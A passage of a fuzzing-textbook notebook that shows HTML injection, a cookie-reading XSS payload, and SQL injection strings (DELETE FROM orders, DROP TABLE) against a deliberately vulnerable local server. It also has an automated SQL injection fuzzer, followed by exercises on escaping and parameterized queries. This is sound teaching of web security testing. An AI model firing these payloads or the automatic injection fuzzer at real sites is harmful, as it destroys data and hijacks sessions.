cute cat pictures!</a></strong>\n </p>\n ''')],\n})", "_____no_output_____" ] ], [ [ "If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded in:", "_____no_output_____" ] ], [ [ "html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)\norder_with_injected_html = html_injection_fuzzer.fuzz()\norder_with_injected_html", "_____no_output_____" ] ], [ [ "What hapens if we send this string to our Web server? It turns out that the HTML is left in the confirmation page and shown as link. This also happens in the log:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))", "_____no_output_____" ] ], [ [ "Since the link seemingly comes from a trusted origin, users are much more likely to follow it. The link is even persistent, as it is stored in the database:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders WHERE name LIKE '%<%'\").fetchall())", "[('drill', '\\n Jane Doe<p>\\n <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\\n </p>\\n ', '[email protected]', 'Seattle', '02805')]\n" ] ], [ [ "This means that anyone ever querying the database (for instance, operators processing the order) will also see the link, multiplying its impact. By carefully crafting the injected HTML, one can thus expose malicious content to a large number of users – until the injected HTML is finally deleted.", "_____no_output_____" ], [ "### Cross-Site Scripting Attacks\n\nIf one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML. This code would then be executed as soon as the injected HTML is rendered. \n\nThis is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin.\n\nIn such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML. For instance, the code can access sensitive page content or session cookies. If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers.", "_____no_output_____" ], [ "Here is a very simple example of a script injection. Whenever the name is displayed, it causes the browser to \"steal\" the current *session cookie* – the piece of data the browser uses to identify the user with the server. In our case, we could steal the cookie of the Jupyter session.", "_____no_output_____" ] ], [ [ "ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {\n \"<name>\": [cgi_encode('Jane Doe' +\n '<script>' +\n 'document.title = document.cookie.substring(0, 10);' +\n '</script>')\n ],\n})", "_____no_output_____" ], [ "xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)\norder_with_injected_xss = xss_injection_fuzzer.fuzz()\norder_with_injected_xss", "_____no_output_____" ], [ "url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)\nurl_with_injected_xss", "_____no_output_____" ], [ "HTML(webbrowser(url_with_injected_xss, mute=True))", "_____no_output_____" ] ], [ [ "The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your \"secret\" notebook cookie. Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to highjack your current notebook session and interact with the server on your behalf. It could also go and access and send any other data that is shown in your browser or otherwise available. It could run a *keylogger* and steal passwords and other sensitive data as it is typed in. Again, it will do so every time the compromised order with Jane Doe's name is shown in the browser and the associated script is executed.", "_____no_output_____" ], [ "Let us go and reset the title to a less sensitive value:", "_____no_output_____" ] ], [ [ "HTML('<script>document.title = \"Jupyter\"</script>')", "_____no_output_____" ] ], [ [ "### SQL Injection Attacks\n\nCross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside of your browser. So-called *SQL injection* targets _databases_, allowing to inject commands that can read or modify data in the database, or change the purpose of the original query.", "_____no_output_____" ], [ "To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database:\n\n```python\nsql_command = (\"INSERT INTO orders \" +\n \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\n```\n\nWhat happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_ Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`.", "_____no_output_____" ], [ "Let us illustrate this by an example. We set the individual values as they would be found during execution:", "_____no_output_____" ] ], [ [ "values: Dict[str, str] = {\n \"item\": \"tshirt\",\n \"name\": \"Jane Doe\",\n \"email\": \"[email protected]\",\n \"city\": \"Seattle\",\n \"zip\": \"98104\"\n}", "_____no_output_____" ] ], [ [ "and format the string as seen above:", "_____no_output_____" ] ], [ [ "sql_command = (\"INSERT INTO orders \" +\n \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\nsql_command", "_____no_output_____" ] ], [ [ "All fine, right? But now, we define a very \"special\" name that can also be interpreted as a SQL command:", "_____no_output_____" ] ], [ [ "values[\"name\"] = \"Jane', 'x', 'x', 'x'); DELETE FROM orders; -- \"", "_____no_output_____" ], [ "sql_command = (\"INSERT INTO orders \" +\n \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\nsql_command", "_____no_output_____" ] ], [ [ "What happens here is that we now get a command to insert values into the database (with a few \"dummy\" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table. The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored. By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more.", "_____no_output_____" ], [ "Is our server also vulnerable to such attacks? Of course it is. We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above.", "_____no_output_____" ] ], [ [ "from Grammars import extend_grammar", "_____no_output_____" ], [ "ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {\n \"<name>\": [cgi_encode(\"Jane', 'x', 'x', 'x'); DELETE FROM orders; --\")],\n})", "_____no_output_____" ], [ "sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)\norder_with_injected_sql = sql_injection_fuzzer.fuzz()\norder_with_injected_sql", "_____no_output_____" ] ], [ [ "These are the current orders:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('tshirt', 'Jane Doe', '[email protected]', 'Seattle', '98104'), ('lockset', 'Jane Doe', '[email protected]', 'Seattle', '16631'), ('drill', 'Jane Doe', '[email protected]', '', '45732'), ('drill', 'Jane Doe', 'j,[email protected]', 'Seattle', '45732'), ('drill', ' ', '5F @p a ', 'cdb', '3230'), ('drill', ' m', '@@0', 'd', '9'), ('lockset', ' ', 'c@d', '_', '6'), ('lockset', ' ', 'd@_-', '2 0', '1040'), ('tshirt', 'Kb', 'm@ ', 'zy ', '13'), ('lockset', 'd', 'U @t', ' ', '4'), ('tshirt', '_ 2', '1 @ ', ' ', '30'), ('tshirt', ' ', 'a-@ ', ' W', '2'), ('lockset', 'V', ' @aUeeD', ' ', '01'), ('tshirt', 'oc', ' @ ', 'a', '25'), ('drill', '55', '3>@@5', 'L', '0'), ('tshirt', ' ', 'b t2@ ', 'E9', '54'), ('drill', 'R-', 'e@?', ' ', '5'), ('drill', '\\n Jane Doe<p>\\n <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\\n </p>\\n ', '[email protected]', 'Seattle', '02805'), ('lockset', 'Jane Doe<script>document.title = document.cookie.substring(0, 10);</script>', '[email protected]', 'Seattle', '34506')]\n" ] ], [ [ "Let us go and send our URL with SQL injection to the server. From the log, we see that the \"malicious\" SQL command is formed just as sketched above, and executed, too.", "_____no_output_____" ] ], [ [ "contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))", "_____no_output_____" ] ], [ [ "All orders are now gone:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/):", "_____no_output_____" ], [ "![https://xkcd.com/327/](PICS/xkcd_exploits_of_a_mom.png){width=100%}", "_____no_output_____" ], [ "Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief. For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice. We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains.", "_____no_output_____" ], [ "To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL. This is achieved by properly _quoting_ and _escaping_ inputs. The [exercises](#Exercises) give some instructions on what to do.", "_____no_output_____" ], [ "### Leaking Internal Information\n\nTo craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure. Surely, an attacker would not know this and thus not be able to run the attack, right? Unfortunately, it turns out we are leaking all of this information out to the world in the first place. The error message produced by our server reveals everything we need:", "_____no_output_____" ] ], [ [ "answer = webbrowser(urljoin(httpd_url, \"/order\"), mute=True)", "_____no_output_____" ], [ "HTML(answer)", "_____no_output_____" ] ], [ [ "The best way to avoid information leakage through failures is of course not to fail in the first place. But if you fail, _make it hard for the attacker to establish a link between the attack and the failure._ In particular,\n\n* Do not produce \"internal error\" messages (and certainly not ones with internal information).\n* Do not become unresponsive; just go back to the home page and ask the user to supply correct data.\n\nOne more time, the [exercises](#Exercises) give some instructions on how to fix the server.", "_____no_output_____" ], [ "If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called *data dictionary*) in which database servers store their metadata. In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges.", "_____no_output_____" ], [ "## Fully Automatic Web Attacks", "_____no_output_____" ], [ "So far, we have demonstrated the above attacks using our manually written order grammar. However, the attacks also work for generated grammars. We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks:", "_____no_output_____" ] ], [ [ "class SQLInjectionGrammarMiner(HTMLGrammarMiner):\n \"\"\"Demonstration of an automatic SQL Injection attack grammar miner\"\"\"\n\n # Some common attack schemes\n ATTACKS: List[str] = [\n \"<string>' <sql-values>); <sql-payload>; <sql-comment>\",\n \"<string>' <sql-comment>\",\n \"' OR 1=1<sql-comment>'\",\n \"<number> OR 1=1\",\n ]\n\n def __init__(self, html_text: str, sql_payload: str):\n \"\"\"Constructor.\n `html_text` - the HTML form to be attacked\n `sql_payload` - the SQL command to be executed\n \"\"\"\n super().__init__(html_text)\n\n self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {\n \"<text>\": [\"<string>\", \"<sql-injection-attack>\"],\n \"<number>\": [\"<digits>\", \"<sql-injection-attack>\"],\n \"<checkbox>\": [\"<_checkbox>\", \"<sql-injection-attack>\"],\n \"<email>\": [\"<_email>\", \"<sql-injection-attack>\"],\n \"<sql-injection-attack>\": [\n cgi_encode(attack, \"<->\") for attack in self.ATTACKS\n ],\n \"<sql-values>\": [\"\", cgi_encode(\"<sql-values>, '<string>'\", \"<->\")],\n \"<sql-payload>\": [cgi_encode(sql_payload)],\n \"<sql-comment>\": [\"--\", \"#\"],\n })", "_____no_output_____" ], [ "html_miner = SQLInjectionGrammarMiner(\n html_text, sql_payload=\"DROP TABLE orders\")", "_____no_output_____" ], [ "grammar = html_miner.mine_grammar()\ngrammar", "_____no_output_____" ], [ "grammar[\"<text>\"]", "_____no_output_____" ] ], [ [ "We see that several fields now are tested for vulnerabilities:", "_____no_output_____" ] ], [ [ "sql_fuzzer = GrammarFuzzer(grammar)\nsql_fuzzer.fuzz()", "_____no_output_____" ], [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ], [ "contents = webbrowser(urljoin(httpd_url,\n \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"))", "_____no_output_____" ], [ "def orders_db_is_empty():\n \"\"\"Return True if the orders database is empty (= we have been successful)\"\"\"\n\n try:\n entries = db.execute(\"SELECT * FROM orders\").fetchall()\n except sqlite3.OperationalError:\n return True\n return len(entries) == 0", "_____no_output_____" ], [ "orders_db_is_empty()", "_____no_output_____" ] ], [ [ "We create a `SQLInjectionFuzzer` that does it all automatically.", "_____no_output_____" ] ], [ [ "class SQLInjectionFuzzer(WebFormFuzzer):\n \"\"\"Simple demonstrator of a SQL Injection Fuzzer\"\"\"\n\n def __init__(self, url: str, sql_payload : str =\"\", *,\n sql_injection_grammar_miner_class: Optional[type] = None,\n **kwargs):\n \"\"\"Constructor.\n `url` - the Web page (with a form) to retrieve\n `sql_payload` - the SQL command to execute\n `sql_injection_grammar_miner_class` - the miner to be used\n (default: SQLInjectionGrammarMiner)\n Other keyword arguments are passed to `WebFormFuzzer`.\n \"\"\"\n self.sql_payload = sql_payload\n\n if sql_injection_grammar_miner_class is None:\n sql_injection_grammar_miner_class = SQLInjectionGrammarMiner\n self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class\n\n super().__init__(url, **kwargs)\n\n def get_grammar(self, html_text):\n \"\"\"Obtain a grammar with SQL injection commands\"\"\"\n\n grammar_miner = self.sql_injection_grammar_miner_class(\n html_text, sql_payload=self.sql_payload)\n return grammar_miner.mine_grammar()", "_____no_output_____" ], [ "sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\nweb_runner = WebRunner(httpd_url)\ntrials = 1\n\nwhile True:\n sql_fuzzer.run(web_runner)\n if orders_db_is_empty():\n break\n trials += 1", "_____no_output_____" ], [ "trials", "_____no_output_____" ] ], [ [ "Our attack was successful! After less than a second of testing, our database is empty:", "_____no_output_____" ] ], [ [ "orders_db_is_empty()", "_____no_output_____" ] ], [ [ "Again, note the level of possible automation: We can\n\n* Crawl the Web pages of a host for possible forms\n* Automatically identify form fields and possible values\n* Inject SQL (or HTML, or JavaScript) into any of these fields\n\nand all of this fully automatically, not needing anything but the URL of the site.", "_____no_output_____" ], [ "The bad news is that with a tool set as the above, anyone can attack web sites. The even worse news is that such penetration tests take place every day, on every web site. The good news, though, is that after reading this chapter, you now get an idea of how Web servers are attacked every day – and what you as a Web server maintainer could and should do to prevent this.", "_____no_output_____" ], [ "## Synopsis\n\nThis chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.", "_____no_output_____" ], [ "### Fuzzing Web Forms\n\n`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.", "_____no_output_____" ], [ "Here's the grammar extracted for our vulnerable Web server:", "_____no_output_____" ] ], [ [ "web_form_fuzzer = WebFormFuzzer(httpd_url)", "_____no_output_____" ], [ "web_form_fuzzer.grammar['<start>']", "_____no_output_____" ], [ "web_form_fuzzer.grammar['<action>']", "_____no_output_____" ], [ "web_form_fuzzer.grammar['<query>']", "_____no_output_____" ] ], [ [ "Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.", "_____no_output_____" ] ], [ [ "web_form_fuzzer.fuzz()", "_____no_output_____" ] ], [ [ "Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.", "_____no_output_____" ], [ "Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.", "_____no_output_____" ], [ "### SQL Injection Attacks\n\n`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:", "_____no_output_____" ] ], [ [ "sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\nsql_fuzzer.fuzz()", "_____no_output_____" ] ], [ [ "As you can see, the path to be retrieved contains the payload encoded into one of the form field values.", "_____no_output_____" ], [ "Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.", "_____no_output_____" ], [ "`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.", "_____no_output_____" ] ], [ [ "# ignore\nfrom ClassDiagram import display_class_hierarchy\nfrom Fuzzer import Fuzzer, Runner\nfrom Grammars import Grammar, Expansion\nfrom GrammarFuzzer import GrammarFuzzer, DerivationTree", "_____no_output_____" ], [ "# ignore\ndisplay_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,\n HTMLGrammarMiner, SQLInjectionGrammarMiner],\n public_methods=[\n Fuzzer.__init__,\n Fuzzer.fuzz,\n Fuzzer.run,\n Fuzzer.runs,\n Runner.__init__,\n Runner.run,\n WebRunner.__init__,\n WebRunner.run,\n GrammarFuzzer.__init__,\n GrammarFuzzer.fuzz,\n GrammarFuzzer.fuzz_tree,\n WebFormFuzzer.__init__,\n SQLInjectionFuzzer.__init__,\n HTMLGrammarMiner.__init__,\n SQLInjectionGrammarMiner.__init__,\n ],\n types={\n 'DerivationTree': DerivationTree,\n 'Expansion': Expansion,\n 'Grammar': Grammar\n },\n project='fuzzingbook')", "_____no_output_____" ] ], [ [ "## Lessons Learned\n\n* User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.\n* One can _mine grammars from user interfaces_, allowing for their widespread testing.\n* Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.\n* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others.", "_____no_output_____" ], [ "We're done, so we can clean up:", "_____no_output_____" ] ], [ [ "clear_httpd_messages()", "_____no_output_____" ], [ "httpd_process.terminate()", "_____no_output_____" ] ], [ [ "## Next Steps\n\nFrom here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript and mobile user interfaces).\n\nIf you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks.", "_____no_output_____" ], [ "## Background\n\nThe [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications. In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities.\n\nThe [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities.\n\nThe [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source Web site security scanner including several of the features discussed above, and many many more.", "_____no_output_____" ], [ "## Exercises", "_____no_output_____" ], [ "### Exercise 1: Fix the Server\n\nCreate a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`:", "_____no_output_____" ], [ "#### Part 1: Silent Failures\n\nSet up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes.", "_____no_output_____" ], [ "**Solution.** We define a better message that does not reveal tracebacks:", "_____no_output_____" ] ], [ [ "BETTER_HTML_INTERNAL_SERVER_ERROR = \\\n HTML_INTERNAL_SERVER_ERROR.replace(\"<pre>{error_message}</pre>\", \"\")", "_____no_output_____" ], [ "HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)", "_____no_output_____" ] ], [ [ "We have the `internal_server_error()` message return `HTTPStatus.OK` to make it harder for machines to find out something went wrong:", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):\n def internal_server_error(self):\n # Note: No INTERNAL_SERVER_ERROR status\n self.send_response(HTTPStatus.OK, \"Internal Error\")\n\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n exc = traceback.format_exc()\n self.log_message(\"%s\", exc.strip())\n\n # No traceback or other information\n message = BETTER_HTML_INTERNAL_SERVER_ERROR\n self.wfile.write(message.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "#### Part 2: Sanitized HTML\n\nSet up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them.", "_____no_output_____" ] ], [ [ "import html", "_____no_output_____" ] ], [ [ "**Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters.", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n def send_order_received(self, values):\n sanitized_values = {}\n for field in values:\n sanitized_values[field] = html.escape(values[field])\n sanitized_values[\"item_name\"] = html.escape(\n FUZZINGBOOK_SWAG[values[\"item\"]])\n\n confirmation = HTML_ORDER_RECEIVED.format(\n **sanitized_values).encode(\"utf8\")\n\n self.send_response(HTTPStatus.OK, \"Order received\")\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(confirmation)", "_____no_output_____" ] ], [ [ "#### Part 3: Sanitized SQL\n\nSet up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._", "_____no_output_____" ], [ "**Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands. Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands.", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n def store_order(self, values):\n db = sqlite3.connect(ORDERS_DB)\n db.execute(\"INSERT INTO orders VALUES (?, ?, ?, ?, ?)\",\n (values['item'], values['name'], values['email'], values['city'], values['zip']))\n db.commit()", "_____no_output_____" ] ], [ [ "One could also argue not to save \"dangerous\" characters in the first place. But then, there might always be names or addresses with special characters which all need to be handled.", "_____no_output_____" ], [ "#### Part 4: A Robust Server\n\nSet up the server such that it does not crash with invalid or missing fields.", "_____no_output_____" ], [ "**Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present. If not, we return to the order form.", "_____no_output_____" ] ], [ [ "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']\n\n def handle_order(self):\n values = self.get_field_values()\n for required_field in self.REQUIRED_FIELDS:\n if required_field not in values:\n self.send_order_form()\n return\n\n self.store_order(values)\n self.send_order_received(values)", "_____no_output_____" ] ], [ [ "This could easily be extended to check for valid (at least non-empty) values. Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message.", "_____no_output_____" ], [ "#### Part 5: Test it!\n\nTest your improved server whether your measures have been successful.", "_____no_output_____" ], [ "**Solution.** Here we go:", "_____no_output_____" ] ], [ [ "httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)", "_____no_output_____" ], [ "print_url(httpd_url)", "_____no_output_____" ], [ "print_httpd_messages()", "_____no_output_____" ] ], [ [ "We test standard behavior:", "_____no_output_____" ] ], [ [ "standard_order = \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"\ncontents = webbrowser(httpd_url + standard_order)\nHTML(contents)", "_____no_output_____" ], [ "assert contents.find(\"Thank you\") > 0", "_____no_output_____" ] ], [ [ "We test for incomplete URLs:", "_____no_output_____" ] ], [ [ "bad_order = \"/order?item=\"\ncontents = webbrowser(httpd_url + bad_order)\nHTML(contents)", "_____no_output_____" ], [ "assert contents.find(\"Order Form\") > 0", "_____no_output_____" ] ], [ [ "We test for HTML (and JavaScript) injection:", "_____no_output_____" ] ], [ [ "injection_order = \"/order?item=tshirt&name=Jane+Doe\" + cgi_encode(\"<script></script>\") + \\\n \"&email=doe%40example.com&city=Seattle&zip=98104\"\ncontents = webbrowser(httpd_url + injection_order)\nHTML(contents)", "_____no_output_____" ], [ "assert contents.find(\"Thank you\") > 0\nassert contents.find(\"<script>\") < 0\nassert contents.find(\"&lt;script&gt;\") > 0", "_____no_output_____" ] ], [ [ "We test for SQL injection:", "_____no_output_____" ] ], [ [ "sql_order = \"/order?item=tshirt&name=\" + \\\n cgi_encode(\"Robert', 'x', 'x', 'x'); DELETE FROM orders; --\") + \\\n \"&email=doe%40example.com&city=Seattle&zip=98104\"\ncontents = webbrowser(httpd_url + sql_order)\nHTML(contents)", "_____no_output_____" ] ], [ [ "(Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...)", "_____no_output_____" ] ], [ [ "assert contents.find(\"DELETE FROM\") > 0\nassert not orders_db_is_empty()", "_____no_output_____" ] ], [ [ "That's it – we're done!", "_____no_output_____" ] ], [ [ "httpd_process.terminate()", "_____no_output_____" ], [ "if os.path.exists(ORDERS_DB):\n os.remove(ORDERS_DB)", "_____no_output_____" ] ], [ [ "### Exercise 2: Protect the Server\n\nAssume that it is not possible for you to alter the server code. Create a _filter_ that is run on all URLs before they are passed to the server.", "_____no_output_____" ], [ "#### Part 1: A Blacklisting Filter\n\nSet up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server. Check the URL for whether it contains HTML, JavaScript, or SQL fragments.", "_____no_output_____" ], [ "#### Part 2: A Whitelisting Filter\n\nSet up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server. Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose.", "_____no_output_____" ], [ "**Solution.** Left to the reader.", "_____no_output_____" ], [ "### Exercise 3: Input Patterns\n\nTo fill out forms, fuzzers could be much smarter in how they generate input values. Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy. A 5-digit ZIP code, for instance, could be defined by the pattern\n\n```html\n<input type=\"text\" pattern=\"[0-9][0-9][0-9][0-9][0-9]\">\n```\n\nExtract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced.", "_____no_output_____" ], [ "**Solution.** Left to the reader at this point.", "_____no_output_____" ], [ "### Exercise 4: Coverage-Driven Web Fuzzing\n\nCombine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage.", "_____no_output_____" ], [ "**Solution.** Left to the reader at this point.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ 